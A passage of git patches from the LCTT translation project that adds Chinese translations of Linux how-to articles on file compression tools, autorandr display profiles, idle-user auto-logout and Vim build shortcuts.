+在 Linux 系统上最常用的文件压缩命令包括 `zip`、`gzip`、`bzip2`、`xz`。 所有这些压缩命令都以类似的方式工作,但是你需要权衡有多少文件要压缩(节省多少空间)、压缩花费的时间、压缩文件在其他你需要使用的系统上的兼容性。
+
+有时压缩一个文件并不会花费很多时间和精力。在下面的例子中,被压缩的文件实际上比原始文件要大。这并不是一个常见情况,但是有可能发生——尤其是在文件内容达到一定程度的随机性。
```
$ time zip bigfile.zip bigfile
@@ -38,10 +47,14 @@ $ ls -l bigfile*
-rw-r--r-- 1 root root 0 12月 20 22:36 bigfile
-rw------- 1 root root 164 12月 20 22:41 bigfile.zip
```
- 注意压缩后的文件 ( bigfile.zip ) 比源文件 ( bigfile ) 要大 。如果压缩增加了文件的大小或者减少的很少的百分比 ,那就只剩下在线备份的好处了 。如果你在压缩文件后看到了下面的信息 。你不会得到太多的益处 。
- ( defalted 1% )
- 文件内容在文件压缩的过程中有很重要的作用 。在上面文件大小增加的例子中是因为文件内容过于随机 。压缩一个文件内容只包含 0 的文件 。你会有一个相当震惊的压缩比 。在如此极端的情况下 ,三个常用的压缩工具都有非常棒的效果 。
+注意该文件压缩后的版本(`bigfile.zip`)比原始文件(`bigfile`)要大。如果压缩增加了文件的大小或者减少很少的比例,也许唯一的好处就是便于在线备份。如果你在压缩文件后看到了下面的信息,你不会从压缩中得到什么受益。
+
+```
+ ( defalted 1% )
+```
+
+文件内容在文件压缩的过程中有很重要的作用。在上面文件大小增加的例子中是因为文件内容过于随机。压缩一个文件内容只包含 `0` 的文件,你会有一个相当震惊的压缩比。在如此极端的情况下,三个常用的压缩工具都有非常棒的效果。
```
-rw-rw-r-- 1 shs shs 10485760 Dec 8 12:31 zeroes.txt
@@ -50,8 +63,10 @@ $ ls -l bigfile*
-rw-rw-r-- 1 shs shs 1660 Dec 8 12:31 zeroes.txt.xz
-rw-rw-r-- 1 shs shs 10360 Dec 8 12:24 zeroes.zip
```
- 你不会喜欢为了查看文件中的 50 个字节的而将 10 0000 0000 字节的数据完全解压 。这样是及其不可能的 。
- 在更真实的情况下 ,大小差异是总体上的不同 -- 不是重大的效果 -- 对于一个小的公正的 jpg 的图片文件 。
+
+令人印象深刻的是,你不太可能看到超过 1000 万字节而压缩到少于 50 字节的文件, 因为基本上不可能有这样的文件。
+
+在更真实的情况下 ,大小差异总体上是不同的,但是差别并不显著,比如对于确实不太大的 jpg 图片文件来说。
```
-rw-r--r-- 1 shs shs 13522 Dec 11 18:58 image.jpg
@@ -61,7 +76,8 @@ $ ls -l bigfile*
-rw-r--r-- 1 shs shs 13581 Dec 11 18:58 image.jpg.zip
```
- 在压缩拉的文本文件时 ,你会发现重要的不同 。
+在对大的文本文件同样进行压缩时 ,你会看到显著的不同。
+
```
$ ls -l textfile*
-rw-rw-r-- 1 shs shs 8740836 Dec 11 18:41 textfile
@@ -71,11 +87,11 @@ $ ls -l textfile*
-rw-rw-r-- 1 shs shs 1977808 Dec 11 18:41 textfile.zip
```
- 在这种情况下 ,XZ 相较于其他压缩文件有效的减小了文件的大小 ,对于第二的 bzip2 命令也有很大的提高
+在这种情况下 ,`xz` 相较于其他压缩命令有效的减小了文件大小,对于第二的 bzip2 命令也是如此。
-## 查看压缩文件
+### 查看压缩文件
- 以 more 结尾的命令能够让你查看压缩文件而不解压文件 。
+这些以 `more` 结尾的命令(`bzmore` 等等)能够让你查看压缩文件的内容而不需要解压文件。
```
bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text
@@ -83,33 +99,45 @@ lzmore (1) - view xz or lzma compressed (text) files
xzmore (1) - view xz or lzma compressed (text) files
zmore (1) - file perusal filter for crt viewing of compressed text
```
- 这些命令在大多数工作中被使用 ,自从不得不使文件解压缩而只为了显示给用户 。在另一方面 ,留下被解压的文件在系统中 。这些命令简单的使文件解压缩 。
+
+为了解压缩文件内容显示给你,这些命令做了大量的计算。但在另一方面,它们不会把解压缩后的文件留在你系统上,它们只是即时解压需要的部分。
```
$ xzmore textfile.xz | head -1
Here is the agenda for tomorrow's staff meeting:
```
-## 比较压缩文件
- 许多的压缩工具箱包含一个差异命令 ( 例如 :xzdiff ) 。这些工具通过这些工作来进行比较和差异而不是做算法指定的比较 。例如 ,xzdiff 命令比较 bz2 类型的文件和比较 xz 类型的文件一样简单 。
+### 比较压缩文件
-## 如何选择最好的 Linux 压缩工具
- 如何选择压缩工具取决于你工作 。在一些情况下 ,选择取决于你所压缩的数据内容 。在更多的情况下 ,取决你你组织的惯例 ,除非你对磁盘空间有着很高的敏感度 。下面是一般的建议 :
- zip :文件需要被分享或者会在 Windows 系统下使用 。
- gzip :文件在 Unix/Linux 系统下使用 。长远来看 ,bzip2 是普遍存在的 。
- bzip2 :使用了不同的算法 ,产生比 gzip 更小的文件 ,但是花更长的时间 。
- xz :一般提供做好的压缩率 ,但是也会花费相当的时间 。比其他工具更新 ,可能在你工作的系统上不存在 。
+有几个压缩工具箱包含一个差异命令(例如 :`xzdiff`),那些工具会把这些工作交给 `cmp` 和 `diff` 来进行比较,而不是做特定算法的比较。例如,`xzdiff` 命令比较 bz2 类型的文件和比较 xz 类型的文件一样简单 。
-## 注意
- 当你在压缩文件时,你有很多选择 ,在极少的情况下 ,会产生无效的磁盘存储空间。
+### 如何选择最好的 Linux 压缩工具
+
+如何选择压缩工具取决于你工作。在一些情况下,选择取决于你所压缩的数据内容。在更多的情况下,取决你组织内的惯例,除非你对磁盘空间有着很高的敏感度。下面是一般性建议:
+
+**zip** 对于需要分享给或者在 Windows 系统下使用的文件最适合。
+
+**gzip** 或许对你要在 Unix/Linux 系统下使用的文件是最好的。虽然 bzip2 已经接近普及,但 gzip 看起来仍将长期存在。
+
+**bzip2** 使用了和 gzip 不同的算法,并且会产生比 gzip 更小的文件,但是它们需要花费更长的时间进行压缩。
+
+**xz** 通常可以提供最好的压缩率,但是也会花费相当长的时间。它比其他工具更新一些,可能在你工作的系统上还不存在。
+
+### 注意
+
+在压缩文件时,你有很多选择,而在极少的情况下,并不能有效节省磁盘存储空间。
--------------------------------------------------------------------------------
+
via: https://www.networkworld.com/article/3240938/linux/how-to-squeeze-the-most-out-of-linux-file-compression.html
-作者 :[ Sandra Henry-Stocker ][1] 译者:[ singledo ][2] 校对:校对者ID
+作者:[Sandra Henry-Stocker][1]
+译者:[singledo][2]
+校对:[wxy][4]
本文由 [ LCTT ][3]原创编译,Linux中国 荣誉推出
[1]:https://www.networkworld.com
[2]:https://github.com/singledo
-[3]:https://github.com/LCTT/TranslateProject
\ No newline at end of file
+[3]:https://github.com/LCTT/TranslateProject
+[4]:https://github.com/wxy
\ No newline at end of file
From 128c2ef3ca7a301dcd8089f793b99e64bf3e4a21 Mon Sep 17 00:00:00 2001
From: wxy
Date: Tue, 9 Jan 2018 00:18:59 +0800
Subject: [PATCH 185/371] PUB:20171214 How to squeeze the most out of Linux
file compression.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@singledo 文章首发地址: https://linux.cn/article-9221-1.html
你的 LCTT 专页地址: https://linux.cn/lctt/singledo
加油!
---
...71214 How to squeeze the most out of Linux file compression.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171214 How to squeeze the most out of Linux file compression.md (100%)
diff --git a/translated/tech/20171214 How to squeeze the most out of Linux file compression.md b/published/20171214 How to squeeze the most out of Linux file compression.md
similarity index 100%
rename from translated/tech/20171214 How to squeeze the most out of Linux file compression.md
rename to published/20171214 How to squeeze the most out of Linux file compression.md
From 4e05541a8ece5b28ca1c14c514e5d42f123cc808 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Tue, 9 Jan 2018 08:19:52 +0800
Subject: [PATCH 186/371] Translating by stevenzdg988
---
...1231 Making Vim Even More Awesome With These Cool Features.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md b/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
index f920aadc96..05611d8482 100644
--- a/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
+++ b/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
@@ -1,3 +1,4 @@
+Translating by stevenzdg988
Making Vim Even More Awesome With These Cool Features
======
From 3e4262ae08938082c64cd631408cd64b319ef30c Mon Sep 17 00:00:00 2001
From: geekpi
Date: Tue, 9 Jan 2018 09:12:05 +0800
Subject: [PATCH 187/371] translated
---
...ndr- automatically adjust screen layout.md | 52 -------------------
...ndr- automatically adjust screen layout.md | 50 ++++++++++++++++++
2 files changed, 50 insertions(+), 52 deletions(-)
delete mode 100644 sources/tech/20171106 Autorandr- automatically adjust screen layout.md
create mode 100644 translated/tech/20171106 Autorandr- automatically adjust screen layout.md
diff --git a/sources/tech/20171106 Autorandr- automatically adjust screen layout.md b/sources/tech/20171106 Autorandr- automatically adjust screen layout.md
deleted file mode 100644
index c9ad9b8182..0000000000
--- a/sources/tech/20171106 Autorandr- automatically adjust screen layout.md
+++ /dev/null
@@ -1,52 +0,0 @@
-translating---geekpi
-
-Autorandr: automatically adjust screen layout
-======
-Like many laptop users, I often plug my laptop into different monitor setups (multiple monitors at my desk, projector when presenting, etc.) Running xrandr commands or clicking through interfaces gets tedious, and writing scripts isn't much better.
-
-Recently, I ran across [autorandr][1], which detects attached monitors using EDID (and other settings), saves xrandr configurations, and restores them. It can also run arbitrary scripts when a particular configuration is loaded. I've packed it, and it is currently waiting in NEW. If you can't wait, the [deb is here][2] and the [git repo is here][3].
-
-To use it, simply install the package, and create your initial configuration (in my case, undocked):
-```
- autorandr --save undocked
-
-```
-
-then, dock your laptop (or plug in your external monitor(s)), change the configuration using xrandr (or whatever you use), and save your new configuration (in my case, workstation):
-```
-autorandr --save workstation
-
-```
-
-repeat for any additional configurations you have (or as you find new configurations).
-
-Autorandr has `udev`, `systemd`, and `pm-utils` hooks, and `autorandr --change` should be run any time that new displays appear. You can also run `autorandr --change` or `autorandr --load workstation` manually too if you need to. You can also add your own `~/.config/autorandr/$PROFILE/postswitch` script to run after a configuration is loaded. Since I run i3, my workstation configuration looks like this:
-```
- #!/bin/bash
-
- xrandr --dpi 92
- xrandr --output DP2-2 --primary
- i3-msg '[workspace="^(1|4|6)"] move workspace to output DP2-2;'
- i3-msg '[workspace="^(2|5|9)"] move workspace to output DP2-3;'
- i3-msg '[workspace="^(3|8)"] move workspace to output DP2-1;'
-
-```
-
-which fixes the dpi appropriately, sets the primary screen (possibly not needed?), and moves the i3 workspaces about. You can also arrange for configurations to never be run by adding a `block` hook in the profile directory.
-
-Check it out if you change your monitor configuration regularly!
-
---------------------------------------------------------------------------------
-
-via: https://www.donarmstrong.com/posts/autorandr/
-
-作者:[Don Armstrong][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.donarmstrong.com
-[1]:https://github.com/phillipberndt/autorandr
-[2]:https://www.donarmstrong.com/autorandr_1.2-1_all.deb
-[3]:https://git.donarmstrong.com/deb_pkgs/autorandr.git
diff --git a/translated/tech/20171106 Autorandr- automatically adjust screen layout.md b/translated/tech/20171106 Autorandr- automatically adjust screen layout.md
new file mode 100644
index 0000000000..4dc8095669
--- /dev/null
+++ b/translated/tech/20171106 Autorandr- automatically adjust screen layout.md
@@ -0,0 +1,50 @@
+Autorandr:自动调整屏幕布局
+======
+像许多笔记本用户一样,我经常将笔记本插入到不同的显示器上(桌面上有多台显示器,演示时有投影机等)。运行 xrandr 命令或点击界面非常繁琐,编写脚本也不是很好。
+
+最近,我遇到了 [autorandr][1],它使用 EDID(和其他设置)检测连接的显示器,保存 xrandr 配置并恢复它们。它也可以在加载特定配置时运行任意脚本。我已经打包了它,目前仍在 NEW 状态。如果你不能等待,[这是 deb][2],[这是 git 仓库][3]。
+
+要使用它,只需安装软件包,并创建你的初始配置(我这里是 undocked):
+```
+ autorandr --save undocked
+
+```
+
+然后,连接你的笔记本(或者插入你的外部显示器),使用 xrandr(或其他任何)更改配置,然后保存你的新配置(我这里是 workstation):
+```
+autorandr --save workstation
+
+```
+
+对你额外的配置(或当你有新的配置)进行重复操作。
+
+Autorandr 有 `udev`、`systemd` 和 `pm-utils` 钩子,当新的显示器出现时 `autorandr --change` 应该会立即运行。如果需要,也可以手动运行 `autorandr --change` 或 `autorandr - load workstation`。你也可以在加载配置后在 `~/.config/autorandr/$PROFILE/postswitch` 添加自己的脚本来运行。由于我运行 i3,我的工作站配置如下所示:
+```
+ #!/bin/bash
+
+ xrandr --dpi 92
+ xrandr --output DP2-2 --primary
+ i3-msg '[workspace="^(1|4|6)"] move workspace to output DP2-2;'
+ i3-msg '[workspace="^(2|5|9)"] move workspace to output DP2-3;'
+ i3-msg '[workspace="^(3|8)"] move workspace to output DP2-1;'
+
+```
+
+它适当地修正了 dpi,设置主屏幕(可能不需要?),并移动 i3 工作区。你可以通过在配置文件目录中添加一个 `block` 钩子来安排配置永远不会运行。
+
+如果你定期更换显示器,请看一下!
+
+--------------------------------------------------------------------------------
+
+via: https://www.donarmstrong.com/posts/autorandr/
+
+作者:[Don Armstrong][a]
+译者:[geekpi](https://github.com/geekpi)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.donarmstrong.com
+[1]:https://github.com/phillipberndt/autorandr
+[2]:https://www.donarmstrong.com/autorandr_1.2-1_all.deb
+[3]:https://git.donarmstrong.com/deb_pkgs/autorandr.git
From 3fcc6e85847b3f7c70b46f817bfebcd44d1b3bed Mon Sep 17 00:00:00 2001
From: geekpi
Date: Tue, 9 Jan 2018 09:15:07 +0800
Subject: [PATCH 188/371] translating
---
...t Linux Desktop To Default Settings With A Single Command.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md b/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md
index 84d60dae91..a5f819da51 100644
--- a/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md
+++ b/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md
@@ -1,3 +1,5 @@
+translating---geekpi
+
Reset Linux Desktop To Default Settings With A Single Command
======
![](https://www.ostechnix.com/wp-content/uploads/2017/10/Reset-Linux-Desktop-To-Default-Settings-720x340.jpg)
From 7c15c307e6bcbee1fa28c97ecd0c94acb1e24175 Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Tue, 9 Jan 2018 10:12:31 +0800
Subject: [PATCH 189/371] Update 20170925 Linux Free Command Explained for
Beginners (6 Examples).md
---
...5 Linux Free Command Explained for Beginners (6 Examples).md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md b/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
index 9cdd4c4b1c..5773719420 100644
--- a/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
+++ b/sources/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
@@ -1,3 +1,5 @@
+Translating by jessie-pang
+
Linux Free Command Explained for Beginners (6 Examples)
======
From 74509026986f3b1cf2159754e11986d2eebd0cdf Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 13:03:19 +0800
Subject: [PATCH 190/371] translate done: 20170916 How To Auto Logout Inactive
Users After A Period Of Time In Linux.md
---
...e Users After A Period Of Time In Linux.md | 135 ------------------
...e Users After A Period Of Time In Linux.md | 131 +++++++++++++++++
2 files changed, 131 insertions(+), 135 deletions(-)
delete mode 100644 sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
create mode 100644 translated/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
diff --git a/sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md b/sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
deleted file mode 100644
index ad6ac12b1d..0000000000
--- a/sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
+++ /dev/null
@@ -1,135 +0,0 @@
-translating by lujun9972
-How To Auto Logout Inactive Users After A Period Of Time In Linux
-======
-
-![](https://www.ostechnix.com/wp-content/uploads/2017/09/logout-720x340.jpg)
-
-Let us picture this scenario. You have a shared server which is regularly being accessed by many users from all systems in the network. There are chances that some user may forget to logout his session and left the session open. As we all know, leaving an user session open is dangerous. Some users may do some damage intentionally. Would you, as a system admin, go and check each and every system to verify whether the users have logged out or not? Not necessary. Also, It's quite time consuming process if you have hundreds of machines in your network. Instead, you can make an user to auto logout from a local or SSH session after a particular period of inactivity. This brief tutorial describes how to auto logout inactive users after a particular period of time in Unix-like systems. It's not that difficult. Follow me.
-
-### Auto Logout Inactive Users After A Period Of Time In Linux
-
-We can do it in three ways. Let us see the first method.
-
-**Method 1:**
-
-Edit **~/.bashrc** or **~/.bash_profile** file:
-```
-$ vi ~/.bashrc
-```
-
-Or,
-```
-$ vi ~/.bash_profile
-```
-
-Add the following lines in it.
-```
-TMOUT=100
-```
-
-This makes the user to logout automatically after an inactivity of 100 seconds. You can define this value as per your convenient. Save and close the file.
-
-Apply the changes by running the following command:
-```
-$ source ~/.bashrc
-```
-
-Or,
-```
-$ source ~/.bash_profile
-```
-
-Now, leave the session idle for 100 seconds. After an inactivity of 100 seconds, you will see the following message and the user will automatically logged out from the session.
-```
-timed out waiting for input: auto-logout
-Connection to 192.168.43.2 closed.
-```
-
-This setting can be easily modified by the user. Because, ~/.bashrc file is owned by the user himself.
-
-To modify or delete this timeout settings, simply delete the lines added above and apply the changes by running "source ~/.bashrc" command.
-
-Alternatively, the user can disable this by running the following commands:
-```
-$ export TMOUT=0
-```
-
-Or,
-```
-$ unset TMOUT
-```
-
-If you want to prevent the user from changing the settings, follow second method instead.
-
-**Method 2:**
-
-Log in as root user.
-
-Create a new file called **" autologout.sh"**.
-```
-# vi /etc/profile.d/autologout.sh
-```
-
-Add the following lines:
-```
-TMOUT=100
-readonly TMOUT
-export TMOUT
-```
-
-Save and close the file.
-
-Make it as executable using command:
-```
-# chmod +x /etc/profile.d/autologout.sh
-```
-
-Now, logout or reboot your system. The inactive user will automatically be logged out after 100 seconds. The normal user can't change this settings even if he/she wanted to stay in the session. They will be thrown out exactly after 100 seconds.
-
-These two methods are are applicable for both local session and remote session i.e the locally logged-in users or and/or the users logged-in from a remote system via SSH. Next we are going to see how to automatically logout only the inactive SSH sessions, not local sessions.
-
-**Method 3:**
-
-In this method, we will only making the SSH session users to log out after a particular period of inactivity.
-
-Edit **/etc/ssh/sshd_config** file:
-```
-$ sudo vi /etc/ssh/sshd_config
-```
-
-Add/modify the following lines:
-```
-ClientAliveInterval 100
-ClientAliveCountMax 0
-```
-
-Save and close this file. Restart sshd service to take effect the changes.
-```
-$ sudo systemctl restart sshd
-```
-
-Now, ssh to this system from a remote system. After 100 seconds, the ssh session will be automatically closed and you will see the following message:
-```
-$ Connection to 192.168.43.2 closed by remote host.
-Connection to 192.168.43.2 closed.
-```
-
-Now, whoever access this system from a remote system via SSH will automatically be logged out after an inactivity of 100 seconds.
-
-Hope this helps. I will be soon here with another useful guide. If you find our guides helpful, please share them on your social, professional networks and support OSTechNix!
-
-Cheers!
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ostechnix.com/auto-logout-inactive-users-period-time-linux/
-
-作者:[SK][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ostechnix.com/author/sk/
diff --git a/translated/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md b/translated/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
new file mode 100644
index 0000000000..10decaada3
--- /dev/null
+++ b/translated/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
@@ -0,0 +1,131 @@
+如何在 Linux 上让一段时间不活动的用户自动登出
+======
+
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/logout-720x340.jpg)
+
+让我们想象这么一个场景。你有一台服务器经常被网络中各系统的很多个用户访问。有可能出现某些用户忘记登出会话让会话保持会话处于连接状态。我们都知道留下一个处于连接状态的用户会话是一件多么危险的事情。有些用户可能会借此故意做一些损坏系统的事情。而你,作为一名系统管理员,会去每个系统上都检查一遍用户是否有登出吗?其实这完全没必要的。而且若网络中有成百上千台机器,这也太耗时了。不过,你可以让用户在本机或 SSH 会话上超过一定时间不活跃的情况下自动登出。本教程就将教你如何在类 Unix 系统上实现这一点。一点都不难。跟我做。
+
+### 在 Linux 上实现一段时间后自动登出非活动用户
+
+有三种实现方法。让我们先来看第一种方法。
+
+#### 方法 1:
+
+编辑 **~/.bashrc** 或 **~/.bash_profile** 文件:
+```
+$ vi ~/.bashrc
+```
+或,
+```
+$ vi ~/.bash_profile
+```
+
+将下面行加入其中。
+```
+TMOUT=100
+```
+
+这回让用户在停止动作 100 秒后自动登出。你可以根据需要定义这个值。保存并关闭文件。
+
+运行下面命令让更改生效:
+```
+$ source ~/.bashrc
+```
+或,
+```
+$ source ~/.bash_profile
+```
+
+现在让会话闲置 100 秒。100 秒不活动后,你会看到下面这段信息,并且用户会自动退出会话。
+```
+timed out waiting for input: auto-logout
+Connection to 192.168.43.2 closed.
+```
+
+该设置可以轻易地被用户所修改。因为,`~/.bashrc` 文件被用户自己所拥有。
+
+要修改或者删除超时设置,只需要删掉上面添加的行然后执行 "source ~/.bashrc" 命令让修改生效。
+
+此啊玩 i,用户也可以运行下面命令来禁止超时:
+```
+$ export TMOUT=0
+```
+或,
+```
+$ unset TMOUT
+```
+
+若你想阻止用户修改该设置,使用下面方法代替。
+
+#### 方法 2:
+
+以 root 用户登陆
+
+创建一个名为 `autologout.sh` 的新文件。
+```
+# vi /etc/profile.d/autologout.sh
+```
+
+加入下面内容:
+```
+TMOUT=100
+readonly TMOUT
+export TMOUT
+```
+
+保存并退出该文件。
+
+为它添加可执行权限:
+```
+# chmod +x /etc/profile.d/autologout.sh
+```
+
+现在,登出或者重启系统。非活动用户就会在 100 秒后自动登出了。普通用户即使想保留会话连接但也无法修改该配置了。他们会在 100 秒后强制退出。
+
+这两种方法对本地会话和远程会话都适用(即本地登陆的用户和远程系统上通过 SSH 登陆的用户)。下面让我们来看看如何实现只自动登出非活动的 SSH 会话,而不自动登出本地会话。
+
+#### 方法 3:
+
+这种方法,我们智慧让 SSH 会话用户在一段时间不活动后自动登出。
+
+编辑 `/etc/ssh/sshd_config` 文件:
+```
+$ sudo vi /etc/ssh/sshd_config
+```
+
+添加/修改下面行:
+```
+ClientAliveInterval 100
+ClientAliveCountMax 0
+```
+
+保存并退出该文件。重启 sshd 服务让改动生效。
+```
+$ sudo systemctl restart sshd
+```
+
+现在,在远程系统通过 ssh 登陆该系统。100 秒后,ssh 会话就会自动关闭了,你也会看到下面消息:
+```
+$ Connection to 192.168.43.2 closed by remote host.
+Connection to 192.168.43.2 closed.
+```
+
+现在,任何人从远程系统通过 SSH 登陆本系统,都会在 100 秒不活动后自动登出了。
+
+希望本文能对你有所帮助。我马上还会写另一篇实用指南。如果你觉得我们的指南有用,请在您的社交网络上分享,支持 OSTechNix!
+
+祝您好运!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/auto-logout-inactive-users-period-time-linux/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
From a9596f9fe2b41ef856624ae20f63f016944511ae Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 13:07:57 +0800
Subject: [PATCH 191/371] fix the case problem
---
...4 Tlog - A Tool to Record - Play Terminal IO and Sessions.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md b/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md
index 09ed8ec879..bdbeecc563 100644
--- a/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md
+++ b/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md
@@ -74,7 +74,7 @@ This command reads the previously recorded file tlog.log from the file path ment
Tlog is an open-source package which can be used for implementing centralized user session recording. This is mainly intended to be used as part of a larger user session recording solution but is designed to be independent and reusable.This tool can be a great help for recording everything users do and store it somewhere on the server side safe for the future reference. You can get more details about this package usage in this [documentation][3]. I hope this article is useful to you. Please post your valuable suggestions and comments on this.
### About Saheetha Shameer(the author)
-I'M Working As A Senior System Administrator. I'M A Quick Learner;Have A Slight Inclination Towards Following The Current;Emerging Trends In The Industry. My Hobbies Include Hearing Music;Playing Strategy Computer Games;Reading;Gardening. I Also Have A High Passion For Experimenting With Various Culinary Delights;
+I'm working as a Senior System Administrator. I'm a quick learner and have a slight inclination towards following the current and emerging trends in the industry. My hobbies include hearing music, playing strategy computer games, reading and gardening. I also have a high passion for experimenting with various culinary delights :-)
--------------------------------------------------------------------------------
From d0f6d5ff1e2e69b287761f22b3110f5a8819b986 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Tue, 9 Jan 2018 13:11:36 +0800
Subject: [PATCH 192/371] Translated by stevenzdg988
---
...n More Awesome With These Cool Features.md | 124 ------------------
...n More Awesome With These Cool Features.md | 109 +++++++++++++++
2 files changed, 109 insertions(+), 124 deletions(-)
delete mode 100644 sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
create mode 100644 translated/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
diff --git a/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md b/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
deleted file mode 100644
index 05611d8482..0000000000
--- a/sources/tech/20171231 Making Vim Even More Awesome With These Cool Features.md
+++ /dev/null
@@ -1,124 +0,0 @@
-Translating by stevenzdg988
-Making Vim Even More Awesome With These Cool Features
-======
-
-![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/making-vim-even-more-awesome-with-these-cool-features_orig.jpg)
-
-**Vim** is quite an integral part of Every [Linux Distribution][1] and the most useful tool (of course after the terminal) for Linux Users. At least, this theory holds for me. People might argue that for programming, Vim might not be a good choice as there are different IDEs or other sophisticated text editors like Sublime Text 3, Atom etc. which make the programming job pretty easier.
-
-#### My Thoughts
-
-But what I think is that Vim works the way we want it to right from the very start, while other editors make us work the way they have been designed, not the way we actually want them to work. I can’t say much about other editors cause I haven’t used them much ( I’m biased with Vim ).
-
-Anyway, Let’s make something out of Vim, that really does the Job god damn well.
-
-### Vim for Programming
-
-#### Executing the Code
-
-Consider a scenario, What we do when we are working on a C++ code on Vim and we need to compile and run it.
-
-(a). We get back to the terminal either through (Ctrl + Z) thing or we just save and quit it (:wq).
-
-(b). And the trouble’s ain’t over, we now need to type on something on terminal like this { g++ fileName.cxx }.
-
-
-
-(c). And after that execute it by typing { ./a.out } .
-
-Certainly a lot of things needed to be done in order to get our C++ code running over the shell. But it doesn’t seem to be a Vim way of doing this (as Vim always tends to keep almost everything under one/two keypresses). So, What is the Vim way of doing this stuff?
-
-#### The Vim Way
-
-Vim isn’t just a Text Editor, It is sort of a Programming Language for Editing Text. And that programming language that helps us extending the features of Vim is “VimScript”.
-
-So, with the help of VimScript, we can easily automate our task of Compiling and Running code with just a KeyPress.
-
- [![create functions in vim .vimrc](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_orig.png)][2]
-
-Above is a snippet out of my .vimrc configuration file where i created a function called CPP().
-
-#### Creating Functions in VimScript
-
-The syntax for creating a function in VimScript is pretty easy. It starts with keyword “
-
-**func**
-
-” and is followed by the name of Function [Function Name must start with a capital letter in VimScript, otherwise Vim will give an error]. And the end of the function is denoted by keyword “
-
-**endfunc**
-
-”.
-
-In the function’s body, you can see an
-
-**exec**
-
-statement, whatever you write after the exec keyword is executed over the Vim’s Command Mode (remember the thing starting with: at the bottom of Vim’s window). Now, the string that I passed to the exec is -
-
- [![vim functions commands & symbols](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_1_orig.png)][3]
-
-What happens is when this function is called, it first clears the Terminal Screen, so that only you will be viewing is your output, then it executes g++ over the filename you are working on and after that executes the a.out file formed due to compilation.
-
-Mapping Ctrl+r to run C++ code
-
--------------------------------------------------------------
-
-I mapped the statement :call CPP() to the key-combination (Ctrl+r) so that I could now press Ctrl+r to execute my C++ Code without manually typing :call CPP() and then pressing Enter.
-
-#### End Result
-
-We finally managed to find the Vim Way of doing that stuff. So now, You just hit a button and the output of your C++ code is on your screen, you don’t need to type all that lengthy thing. It sort of saves your time too.
-
-We can achieve this sort of functionality for other languages too.
-
- [![create function in vim for python](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_2_orig.png)][4]
-
-So For Python: Now you could press to interpret your code.
-
- [![create function in vim for java](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/vim_3_orig.png)][5]
-
-For Java: You could now press , it will first Compile your Java Code then interpret your java class file and show you the output.
-
-### Picture ain’t over, Marching a level deep
-
